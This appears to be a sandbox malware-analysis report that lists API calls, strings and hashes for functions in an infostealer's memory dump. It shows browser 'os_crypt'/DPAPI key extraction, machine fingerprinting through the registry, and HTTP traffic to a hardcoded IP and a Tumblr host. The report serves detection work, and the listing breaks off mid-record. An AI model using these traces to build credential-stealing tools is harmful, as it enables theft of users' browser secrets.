CloseHandle.KERNEL32(?,00000000,00000128,00000002,00000000,----------,0000000A,00000001,00000000,?,00000003,00000001,004866C4,00000000,00000294,0040C27B), ref: 0045FE73

Strings

---------- , xrefs: 0045FBFF, 0045FCEF
----------, xrefs: 0045FB2A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3_catchProcess32_memmove$CloseCreateFirstH_prolog3H_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: ----------$----------
API String ID: 4185073159-2385812570
Opcode ID: d882083405ff142ba3a75d8b9e1bc03768b491665361a3ddd9b2f5e60fe1fd0f
Instruction ID: 8ce91db7c522f480c17d37f0fbaebe33bcded60df065d12fb7c244eaa261c5aa
Opcode Fuzzy Hash: d882083405ff142ba3a75d8b9e1bc03768b491665361a3ddd9b2f5e60fe1fd0f
Instruction Fuzzy Hash: 30B182B1804258AEDB15EB55DC45FEEBB7CAF11304F1401AFE505B3182EA781F88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00461EAE, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00461ECD
_memset.LIBCMT ref: 00461EFF
OpenProcess.KERNEL32(00000410,00000000,?,?,?,0000000C), ref: 00461F11
EnumProcessModules.PSAPI(00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F28
GetModuleBaseNameA.PSAPI(00000000,?,00000000,00000104,00000000,?,00000004,00000008,?,?,0000000C), ref: 00461F3E
CloseHandle.KERNEL32(00000000,?,?,0000000C), ref: 00461F44

Strings

<unknown>, xrefs: 00461EE6

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$BaseCloseEnumH_prolog3_catchHandleModuleModulesNameOpen_memset
String ID: <unknown>
API String ID: 3374446145-1574992787
Opcode ID: 244658bc952be1cffe53cceae16e59f270a091707551c94139565e2f8c785d96
Instruction ID: 70ade7331c1fe1be9da5477fc18033a8c7b44bd496c883d75dca9a7224712ffb
Opcode Fuzzy Hash: 244658bc952be1cffe53cceae16e59f270a091707551c94139565e2f8c785d96
Instruction Fuzzy Hash: AC218771504249AFDB15EF54DD41BEE77E4FF08704F00403AEA04EB281E7749B088BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0045EAEC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EB2E
RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0045EB4A
RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0045EB69
RegCloseKey.ADVAPI32(?), ref: 0045EB72
CharToOemA.USER32(?,?), ref: 0045EB83

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0045EB40
ProcessorNameString, xrefs: 0045EB61

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 2235053359-2804670039
Opcode ID: 59a469b855a62e4a5ecf8f7ef6647ec79b3c9db86dd270e6ff7ec8897400576d
Instruction ID: e5e815bb453eb4dbf6689d64094a2c7938900b3b26400d3e7cd6629269ae5e11
Opcode Fuzzy Hash: 59a469b855a62e4a5ecf8f7ef6647ec79b3c9db86dd270e6ff7ec8897400576d
Instruction Fuzzy Hash: 42216DB190424CAFDB30DFA4DC84AEE7BBCEF15348F10447AE919D7152EA345A088B65

Uniqueness

Uniqueness Score: -1.00%

Function 0045EC34, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EC76
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0045EC92
RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0045ECB1
RegCloseKey.ADVAPI32(?), ref: 0045ECBA
CharToOemA.USER32(?,?), ref: 0045ECCB

Strings

ProductName, xrefs: 0045ECA9
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0045EC88

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 2235053359-1787575317
Opcode ID: fb38d4f1524cbc1eef628860479bf1518489fabc99d4b65495c1e7c7711b9ca3
Instruction ID: 8c379a4b8820a6916782180dcbdc89a7d23e9e80b5a7728a3b93e77e92fed359
Opcode Fuzzy Hash: fb38d4f1524cbc1eef628860479bf1518489fabc99d4b65495c1e7c7711b9ca3
Instruction Fuzzy Hash: 32216DB190424DAFDB30EFA4DC84AEE7BBCFF14348F10447AE919D7152EA745A088B65

Uniqueness

Uniqueness Score: -1.00%

Function 0045EDB3, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045EDF5
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0045EE11
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,00000000), ref: 0045EE30
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0045EE39
CharToOemA.USER32(?,?), ref: 0045EE4A

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0045EE07
MachineGuid, xrefs: 0045EE28

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: cc653df27aaf93323914dfb0520260598cb783b32ea9075a7831db828e9480f3
Instruction ID: 0909bb7c1e98fc66e2fd51660931112c9996f97626bdb88c53b1cc856b6dd3fd
Opcode Fuzzy Hash: cc653df27aaf93323914dfb0520260598cb783b32ea9075a7831db828e9480f3
Instruction Fuzzy Hash: 83117FB150024DAFEB30EFA4DC85BEE7BACFB14348F10407AE919D7152EA745A088F65

Uniqueness

Uniqueness Score: -1.00%

Function 00432148, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 208fileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00432191
CreateFileW.KERNEL32(?,?,00000003,00000000,?,?,00000000), ref: 00432278

Strings

psow, xrefs: 00432368
cF, xrefs: 00432243
ddF, xrefs: 00432278
winOpen, xrefs: 004322BA

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile_memset
String ID: cF$ddF$psow$winOpen
API String ID: 3830271748-1418711217
Opcode ID: d213770175949e555960944134189dcef17fad84c3b032168ec75193dd8a712a
Instruction ID: 3535a192b4445eba7f2e29df45c10ff6563ae44010a3d6673375a26cd596bd34
Opcode Fuzzy Hash: d213770175949e555960944134189dcef17fad84c3b032168ec75193dd8a712a
Instruction Fuzzy Hash: 01717E71E00219AFDF009FA5DE42ADEBBB0FB08714F14456BE914B7290D3B89E50CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413A4A, Relevance: 10.6, APIs: 7, Instructions: 137stringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00413A69
_memset.LIBCMT ref: 00413A93

Part of subcall function 004602E7: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040FCF1,?,0000001A,?,?,?,?,0049B0CC,00000000), ref: 00460301

lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 00413AB4
_memset.LIBCMT ref: 00413ABF
lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413AD2
lstrcatA.KERNEL32(?,004867F4,?,?,?,?,?,00000014), ref: 00413AE0
lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 00413AEF

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$_memset$FolderH_prolog3Path
String ID:
API String ID: 1637166636-0
Opcode ID: 1db8fc0d0761bfea98cbaff21caedd78698e921d31283b58dc0fde23c79e8200
Instruction ID: a314fbcfd3a24dd60db52ac6297fed33d3015c10456b263d896aaa7e8f6e0ff5
Opcode Fuzzy Hash: 1db8fc0d0761bfea98cbaff21caedd78698e921d31283b58dc0fde23c79e8200
Instruction Fuzzy Hash: 8251217280414DABCB20EFA5DC85EDF77BCEB04304F00416BF905A7141EA389748CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0042A30C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0042A34E
_memmove.LIBCMT ref: 0042A36B
ReadFile.KERNEL32(?,?,?,?,?), ref: 0042A3B8
_memset.LIBCMT ref: 0042A414

Strings

,cF, xrefs: 0042A3B8
winRead, xrefs: 0042A3EC

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$FileRead_memset
String ID: ,cF$winRead
API String ID: 1942371898-879906288
Opcode ID: 39824cf0660f830ba8e04b238d3064b98fac8a0a859c732e22709e7ead5e247d
Instruction ID: 5b9fb1e42073cd2a928d124bcd6f12092a543c3ca2153f5e9d5f560ccb1dd320
Opcode Fuzzy Hash: 39824cf0660f830ba8e04b238d3064b98fac8a0a859c732e22709e7ead5e247d
Instruction Fuzzy Hash: F3315972A002199BCF00DE68ED8699E3BA5EF44358B54402AFD01DB241D774EE608B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00469C17, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00469C25

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

_free.LIBCMT ref: 00469C38

Strings

I%H, xrefs: 00469C2E, 00469C22, 00469C4A, 00469C6A, 00469C7A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID: I%H
API String ID: 1020059152-285111832
Opcode ID: ada062986fea4932f88c5caf6fd3687089099c52ac3ae6597f28a18e8e9b491d
Instruction ID: 5ba97e963801dce69822805387add4a7d41060ee017b0eb4b3366a982490ec35
Opcode Fuzzy Hash: ada062986fea4932f88c5caf6fd3687089099c52ac3ae6597f28a18e8e9b491d
Instruction Fuzzy Hash: 99110132904615AACB216F31AD05A5A3BDCAB85770B20443BF8499B290FEBCCC41879F

Uniqueness

Uniqueness Score: -1.00%

Function 00467CC1, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00467CDB

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

std::exception::exception.LIBCMT ref: 00467D10
std::exception::exception.LIBCMT ref: 00467D2A
__CxxThrowException@8.LIBCMT ref: 00467D3B

Strings

bad allocation, xrefs: 00467D09
8-@, xrefs: 00467CF3

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: 8-@$bad allocation
API String ID: 615853336-3215286821
Opcode ID: 48fa6f9bf025f085f717d2a59c28ab419e2651d33dda2efd0479edcfb90e60d6
Instruction ID: e5e35db4f3df075466cb9016febb363e0c7d67cddac03f6e487767e48cf787d6
Opcode Fuzzy Hash: 48fa6f9bf025f085f717d2a59c28ab419e2651d33dda2efd0479edcfb90e60d6
Instruction Fuzzy Hash: 5AF0F471508309B6DF00EB56DD42AAE3BA8BB0031CF10543FF500A66A2FBBC9A01874E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAD7, Relevance: 9.1, APIs: 6, Instructions: 62filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040EAEF
GetFileSizeEx.KERNEL32(00000000,?), ref: 0040EB06
LocalAlloc.KERNEL32(00000040,?), ref: 0040EB22
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040EB3C
LocalFree.KERNEL32(?), ref: 0040EB52
FindCloseChangeNotification.KERNEL32(?), ref: 0040EB5D

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: c2324f482fb4666a30dba985fd5f93fc157b250215621647210ee42081955b2d
Instruction ID: 034b4776d24a0182819bf915acfe8b05d1ccc97a12e461bbb3cfa376d772529a
Opcode Fuzzy Hash: c2324f482fb4666a30dba985fd5f93fc157b250215621647210ee42081955b2d
Instruction Fuzzy Hash: 22113071500205FFDB10AFA5DC88AAE7BB8FB04711F200D39F512B2290D735AE54CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00461D79, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00461D80
Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,00000038,0040B38F,?,00000019), ref: 00461DC8
__time64.LIBCMT ref: 00461DD0

Part of subcall function 0046889C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00461DD5,00000000), ref: 004688A7
Part of subcall function 0046889C: __aulldiv.LIBCMT ref: 004688C7

Part of subcall function 0046002B: _malloc.LIBCMT ref: 00460033
Part of subcall function 0046002B: GetTickCount.KERNEL32 ref: 0046003E
Part of subcall function 0046002B: _rand.LIBCMT ref: 00460053
Part of subcall function 0046002B: _sprintf.LIBCMT ref: 00460066

Part of subcall function 0046B2D8: __getptd.LIBCMT ref: 0046B2DD

_rand.LIBCMT ref: 00461DFD

Part of subcall function 0046B2EA: __getptd.LIBCMT ref: 0046B2EA

Part of subcall function 00460380: std::_Xinvalid_argument.LIBCPMT ref: 0046038E

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00461D9B

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time__getptd_rand$CountFileH_prolog3_catch_SleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 503986416-374730529
Opcode ID: ec577f3ad1545ca5e3d2dacffa2ec0d59528fdd9c29a621d179bb820e062212f
Instruction ID: 88f4b045568469931c6319c2667ea5b9293ab10806897224fd332c4c367be4ef
Opcode Fuzzy Hash: ec577f3ad1545ca5e3d2dacffa2ec0d59528fdd9c29a621d179bb820e062212f
Instruction Fuzzy Hash: 0121D271900304ABDB14EFA6D846BADBBB4BF50705F10045FF2016B1C2DBB85605CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0045F8AA, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0045F8B4
GetSystemTime.KERNEL32(?,000000F4,0040BFA4,00000001,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 0045F8D5
GetTimeZoneInformation.KERNEL32(00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 0045F8E2
TzSpecificLocalTimeToSystemTime.KERNEL32(00000001,?,?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001), ref: 0045F905

Part of subcall function 004622C5: __EH_prolog3.LIBCMT ref: 004622CF

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

UTC, xrefs: 0045F93D

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$System$H_prolog3H_prolog3_InformationLocalSpecificZone_memmove
String ID: UTC
API String ID: 473020483-2754919731
Opcode ID: 6b7e28b0250761da46142a86de250f18920cee604e328b6b8a4b1076da63f701
Instruction ID: 9d29b071ca3e0d0fda31ed6a18f578b55765b9cd6ea7bdb432508796c030d5f2
Opcode Fuzzy Hash: 6b7e28b0250761da46142a86de250f18920cee604e328b6b8a4b1076da63f701
Instruction Fuzzy Hash: 5B119D7184011EBFDB51EBE4DC09BEEB778BF08705F0044BAE204F2050EB749A548B19

Uniqueness

Uniqueness Score: -1.00%

Function 00464353, Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004643A7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004643E1

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: d9a86151411ddb3e0fa1df4da690f01b861f4dc52d65d6d7e1e68af288fb2a27
Instruction ID: 8462f6e7d2977f95d40d6420188b9f6b58f601cbe8092f24080167b48dedebbf
Opcode Fuzzy Hash: d9a86151411ddb3e0fa1df4da690f01b861f4dc52d65d6d7e1e68af288fb2a27
Instruction Fuzzy Hash: 2D31CEB0500705EFDF309F258885B277AE8FB54358F108B3FE29682640E778EC858B1A

Uniqueness

Uniqueness Score: -1.00%

Function 0041159A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004115A1

Part of subcall function 0040EAD7: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040EAEF
Part of subcall function 0040EAD7: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040EB06
Part of subcall function 0040EAD7: LocalAlloc.KERNEL32(00000040,?), ref: 0040EB22
Part of subcall function 0040EAD7: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040EB3C
Part of subcall function 0040EAD7: FindCloseChangeNotification.KERNEL32(?), ref: 0040EB5D

Part of subcall function 0045FFED: LocalAlloc.KERNEL32(00000040,?,?,?,004115DE,?,?), ref: 00460005

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

Strings

"os_crypt":{"encrypted_key":", xrefs: 004115E8
, xrefs: 0041168E
DPAPI, xrefs: 00411665

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$AllocLocal$ChangeCloseCreateFindH_prolog3_NotificationReadSizeXinvalid_argument_memmovestd::_
String ID: $"os_crypt":{"encrypted_key":"$DPAPI
API String ID: 3192152120-2919755482
Opcode ID: 8a0013914b4d289f59e4fc7b5988c9e7c60a16f85a90e56ee2bfdfc03a19705d
Instruction ID: 2fee513b1028514a7298ca10d2558cbba36ebad82446db23027957686835b13d
Opcode Fuzzy Hash: 8a0013914b4d289f59e4fc7b5988c9e7c60a16f85a90e56ee2bfdfc03a19705d
Instruction Fuzzy Hash: F8316FB2D10208ABDF18EFA5DC81EEE7774AF14314F14452FF511722D1EB3999458B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1B2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B1B9

Part of subcall function 0040B048: __EH_prolog3_GS.LIBCMT ref: 0040B052
Part of subcall function 0040B048: DeleteUrlCacheEntry.WININET(?), ref: 0040B082
Part of subcall function 0040B048: DeleteUrlCacheEntry.WININET(00000000), ref: 0040B0A4
Part of subcall function 0040B048: InternetOpenA.WININET(004866C4,00000000,00000000,00000000,00000000), ref: 0040B0BD
Part of subcall function 0040B048: InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0040B0F4
Part of subcall function 0040B048: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 0040B118
Part of subcall function 0040B048: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B129
Part of subcall function 0040B048: InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040B147
Part of subcall function 0040B048: InternetCloseHandle.WININET(00000000), ref: 0040B15B
Part of subcall function 0040B048: InternetCloseHandle.WININET(00000000), ref: 0040B162
Part of subcall function 0040B048: InternetCloseHandle.WININET(?), ref: 0040B16E

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 00402EA9: std::_Xinvalid_argument.LIBCPMT ref: 00402EBC
Part of subcall function 00402EA9: _memmove.LIBCMT ref: 00402EF7

_strtok.LIBCMT ref: 0040B285

Strings

188.34.200.103, xrefs: 0040B28F
.tumblr.com, xrefs: 0040B20A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle_memmove$CacheDeleteEntryH_prolog3_HttpOpenRequest$ConnectFileReadSendXinvalid_argument_strtokstd::_
String ID: .tumblr.com$188.34.200.103
API String ID: 1242742592-447660756
Opcode ID: 1cad7a4a33bf8d552a361b4da5d35ea019b12470e6d62a8435979938b5558eb4
Instruction ID: 2308c358fd5106b75575a59d7252b71c1f3012af43e2e273293884e8a273a31d
Opcode Fuzzy Hash: 1cad7a4a33bf8d552a361b4da5d35ea019b12470e6d62a8435979938b5558eb4
Instruction Fuzzy Hash: DD319571C00308AEDB04EBA9C956ADDBB78DF15308F10816FF515B71C2DB781A48D7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D995, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040D9A3
_strcpy_s.LIBCMT ref: 0040D9B9
_memset.LIBCMT ref: 0040D9D4

Strings

1BEF0A57BE110FD467A, xrefs: 0040D9AB

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$_strcpy_s
String ID: 1BEF0A57BE110FD467A
API String ID: 1261871945-2910601657
Opcode ID: 86b6b00ca2f02f14dd942adcd233f2d8246cd2dd4ced8368904fe24d86dc92ab
Instruction ID: 2b9f701e0afc28fe8336a1a9b351877273890074c42d5f63b02f405e389192a9
Opcode Fuzzy Hash: 86b6b00ca2f02f14dd942adcd233f2d8246cd2dd4ced8368904fe24d86dc92ab
Instruction Fuzzy Hash: B9F031B0640704AFC720DF65C842B8B7BE8EB08714F40481EF949D7741E779F8008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEAC, Relevance: 6.4, APIs: 4, Instructions: 356fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040CECB
__wgetenv.LIBCMT ref: 0040CF08

Part of subcall function 00404DBE: __EH_prolog3.LIBCMT ref: 00404DC5

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 0040D129
CopyFileW.KERNEL32(00000000,?,00000001,?,00000000), ref: 0040D242

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharH_prolog3MultiWide$CopyCreateDirectoryFile__wgetenv
String ID:
API String ID: 77913386-0
Opcode ID: 465783db5a9b6af8966f5c7dd8c1eac739dd4cbdf0b5605c9eec6f29d052fbd6
Instruction ID: 49ef1e2f296ce2aa033c89ac9020bd4aa66a5a4b8edb9ea687151e1575ef9358
Opcode Fuzzy Hash: 465783db5a9b6af8966f5c7dd8c1eac739dd4cbdf0b5605c9eec6f29d052fbd6
Instruction Fuzzy Hash: 2DE13DB280118CEEDB25EFA4CD85EEF777CEF55308F00416AB806A6191DA745B08DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 004645A9, Relevance: 6.1, APIs: 4, Instructions: 100timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004645F9
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00464629
GetLocalTime.KERNEL32(?), ref: 00464656
SystemTimeToFileTime.KERNEL32(?,?), ref: 00464664

Part of subcall function 004640D3: GetFileInformationByHandle.KERNEL32(?,?), ref: 00464108

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: 4142433297cfab27ec47e6641b3520804b18cf2ccb64514be06f0e0fc7beef31
Instruction ID: 58b8f38c4f0396bc80ffe4dbaa39c772d34bd71decc5bd4ad1d4a68e66185b91
Opcode Fuzzy Hash: 4142433297cfab27ec47e6641b3520804b18cf2ccb64514be06f0e0fc7beef31
Instruction Fuzzy Hash: AB316571900B089FDB21DF69C8809AFFBF8FB49314B10492FE596D2650E738E945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00402D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00402D9E
__CxxThrowException@8.LIBCMT ref: 00402DB3

Part of subcall function 00467CC1: _malloc.LIBCMT ref: 00467CDB

Strings

8-@, xrefs: 00402DAC

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 8-@
API String ID: 4063778783-2211411525
Opcode ID: accb3e6b8f8ba3296c343fd19db30312f881c8a82b09873786cc17255a27e95e
Instruction ID: 6b18eedb18f0d39473bab3ca1d5a1c3753bda7fac593a15935a7b8e90762b7d9
Opcode Fuzzy Hash: accb3e6b8f8ba3296c343fd19db30312f881c8a82b09873786cc17255a27e95e
Instruction Fuzzy Hash: 1BE03071800209AACF11AF65D9456CD3BA89F00399F10813BA414A51C1E778C6448B89

Uniqueness

Uniqueness Score: -1.00%

Function 0040C97F, Relevance: 5.0, APIs: 4, Instructions: 23sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000022B), ref: 0040C98B
Sleep.KERNEL32(0000006F), ref: 0040C993
Sleep.KERNEL32(0000014D), ref: 0040C99E
Sleep.KERNEL32(000001E4), ref: 0040C9D5

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d7bd20dd804efef325c77db77fb5234fc51949bdaf30a88bc31a2b75510a06d9
Instruction ID: 975e9d9a2a70b5a61a27eafe518d1b07773ddc549889eb8bc10049565a648471
Opcode Fuzzy Hash: d7bd20dd804efef325c77db77fb5234fc51949bdaf30a88bc31a2b75510a06d9
Instruction Fuzzy Hash: 20E01270540280ABE2116BA2DC4FF5F3A68EB41F46F0804BDB601655E2CB785944C7B9

Uniqueness

Uniqueness Score: -1.00%

Function 00464486, Relevance: 4.6, APIs: 3, Instructions: 86fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004644CE
_memmove.LIBCMT ref: 0046451B
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0046453A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$FileWrite
String ID:
API String ID: 726942401-0
Opcode ID: e5687809fe058a09f8a30b7deeb532a6d16df8250235ae735f37a1f5285ee616
